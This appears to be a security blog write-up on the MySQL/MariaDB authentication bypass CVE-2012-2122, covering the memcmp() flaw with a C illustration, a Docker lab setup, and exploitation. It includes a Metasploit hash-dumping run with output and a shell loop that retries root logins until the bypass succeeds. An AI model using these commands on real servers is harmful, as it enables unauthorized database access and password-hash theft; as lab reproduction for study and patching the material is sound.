
MySQL authentication vulnerability (CVE-2012-2122)

Vulnerability description

Disclaimer: the techniques, ideas and tools covered in this article are provided only for learning and exchange for security purposes. Nobody may use them for illegal purposes or for profit; anyone who does bears the consequences themselves!

When a client connects to MariaDB/MySQL, the supplied password is compared with the expected correct password. Because the result of that comparison is handled incorrectly, MySQL can treat the two passwords as identical even when memcmp() returns a non-zero value. In other words, knowing only the username, simply retrying the login enough times will eventually log you straight into the SQL database; according to the advisory, roughly one attempt in 256 succeeds.
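To show the mechanism behind that one-in-256 figure, here is an added example in C (not the MySQL source and not part of the original post): a constructed memcmp() stand-in that returns word-wide differences, the flawed check_scramble() shape that narrows that int to my_bool (char), and the fixed shape beside it. The names wide_memcmp, demo_pair and demo_accepts are assumptions made for this demonstration; the my_bool typedef and SHA1_HASH_SIZE mirror MySQL's definitions, and check_scramble() returns 0 on a match, as in MySQL.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define SHA1_HASH_SIZE 20
typedef char my_bool;  /* MySQL's my_bool of that era was a plain char */

/* Constructed stand-in for an optimized memcmp() that reports the numeric
 * difference of the first differing big-endian 4-byte word instead of -1/0/1.
 * The C standard only guarantees the sign of memcmp()'s result, so this is a
 * legal implementation. */
static int wide_memcmp(const unsigned char *a, const unsigned char *b, size_t n) {
    size_t i;
    for (i = 0; i + 4 <= n; i += 4) {
        uint32_t wa = (uint32_t)a[i] << 24 | (uint32_t)a[i + 1] << 16 | (uint32_t)a[i + 2] << 8 | a[i + 3];
        uint32_t wb = (uint32_t)b[i] << 24 | (uint32_t)b[i + 1] << 16 | (uint32_t)b[i + 2] << 8 | b[i + 3];
        if (wa != wb)
            return (int)((int64_t)wa - (int64_t)wb);
    }
    return memcmp(a + i, b + i, n - i);  /* tail bytes: ordinary comparison */
}

/* Shape of the flawed check_scramble(): the int from the comparison is
 * returned through my_bool (char). A difference whose low byte is zero, such
 * as 256, is narrowed to 0, which the caller reads as "password correct". */
static my_bool check_scramble_flawed(const unsigned char *expected, const unsigned char *supplied) {
    return wide_memcmp(expected, supplied, SHA1_HASH_SIZE);
}

/* Shape of the fix: collapse the result to 0/1 before it is narrowed. */
static my_bool check_scramble_fixed(const unsigned char *expected, const unsigned char *supplied) {
    return wide_memcmp(expected, supplied, SHA1_HASH_SIZE) != 0;
}

/* Constructed sample pair (not real hashes): differs only in byte 2, so the
 * first word differs by exactly 0x100 = 256. */
static void demo_pair(unsigned char expected[SHA1_HASH_SIZE], unsigned char supplied[SHA1_HASH_SIZE]) {
    memset(expected, 0x41, SHA1_HASH_SIZE);
    memcpy(supplied, expected, SHA1_HASH_SIZE);
    supplied[2] -= 1;
}

/* Returns 1 when the given check accepts the sample pair as a match. */
static int demo_accepts(my_bool (*check)(const unsigned char *, const unsigned char *)) {
    unsigned char e[SHA1_HASH_SIZE], s[SHA1_HASH_SIZE];
    demo_pair(e, s);
    return check(e, s) == 0;
}
```

With this pair, demo_accepts(check_scramble_flawed) returns 1 (the wrong hash is accepted) while demo_accepts(check_scramble_fixed) returns 0; any comparison result whose low byte is zero is accepted by the flawed version, which is where the roughly 1/256 success rate comes from.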


Affected versions

  • MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not affected.
  • MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not affected.

FOFA query


Environment setup

Set up with docker:

[root@localhost ~]# cd /opt/docker/vulhub/mysql/CVE-2012-2122/
[root@localhost CVE-2012-2122]# docker-compose up -d
Creating network "cve-2012-2122_default" with the default driver
Pulling mysql (vulhub/mysql:5.5.23)...
5.5.23: Pulling from vulhub/mysql
22dc81ace0ea: Pull complete
1a8b3c87dba3: Pull complete
91390a1c435a: Pull complete
07844b14977e: Pull complete
b78396653dae: Pull complete
fe8cde33ebc9: Pull complete
eb305569f43b: Pull complete
Digest: sha256:5bbb7570f16526da1de61e84487daade5614eb2a9bfd28a87bcf4d6795b94463
Status: Downloaded newer image for vulhub/mysql:5.5.23
Creating cve-2012-2122_mysql_1 ... done

[root@localhost CVE-2012-2122]# docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
2365d270392c vulhub/mysql:5.5.23 "/bin/bash -c mysqld…" 5 minutes ago Up 5 minutes 0.0.0.0:3306->3306/tcp, :::3306->3306/tcp cve-2012-2122_mysql_1

Vulnerability reproduction

Vulnerability analysis

Reference: https://blog.51cto.com/linuxgeek/998210

Vulnerability verification

Verify with the metasploit tool:

root@kali:~# msfconsole 
/usr/share/metasploit-framework/modules/post/windows/mof_ps_persist.rb:38: warning: key "Platform" is duplicated and overwritten on line 48
[!] The following modules were loaded with warnings:
[!] /usr/share/metasploit-framework/modules/post/windows/mof_ps_persist.rb
[!] Please see /root/.msf4/logs/framework.log for details.

, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||


=[ metasploit v5.0.99-dev ]
+ -- --=[ 2045 exploits - 1106 auxiliary - 345 post ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]

Metasploit tip: Use the edit command to open the currently active module in your editor

[*] Starting persistent handler(s)...
msf5 > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf5 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > set rhosts 192.168.220.132
rhosts => 192.168.220.132
msf5 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > run
[+] 192.168.220.132:3306 - 192.168.220.132:3306 The server allows logins, proceeding with bypass test
[*] 192.168.220.132:3306 - 192.168.220.132:3306 Authentication bypass is 10% complete
[*] 192.168.220.132:3306 - 192.168.220.132:3306 Authentication bypass is 20% complete
[*] 192.168.220.132:3306 - 192.168.220.132:3306 Authentication bypass is 30% complete
[*] 192.168.220.132:3306 - 192.168.220.132:3306 Authentication bypass is 40% complete
[*] 192.168.220.132:3306 - 192.168.220.132:3306 Authentication bypass is 50% complete
[*] 192.168.220.132:3306 - 192.168.220.132:3306 Authentication bypass is 60% complete
[+] 192.168.220.132:3306 - 192.168.220.132:3306 Successfully bypassed authentication after 612 attempts. URI: mysql://root:COXazJ@192.168.220.132:3306
[+] 192.168.220.132:3306 - 192.168.220.132:3306 Successfully exploited the authentication bypass flaw, dumping hashes...
[+] 192.168.220.132:3306 - 192.168.220.132:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.220.132:3306 - 192.168.220.132:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.220.132:3306 - 192.168.220.132:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.220.132:3306 - 192.168.220.132:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.220.132:3306 - 192.168.220.132:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.220.132:3306 - 192.168.220.132:3306 Hash Table has been saved: /root/.msf4/loot/20211103060402_default_192.168.220.132_mysql.hashes_563578.txt
[*] 192.168.220.132:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The vulnerability is present!

Vulnerability exploitation

Run on linux:

for i in `seq 1 1000`; do mysql -uroot -pwrong -h 192.168.220.132  ; done


Hardening

  1. Apply the official patch;
  2. Upgrade MySQL.
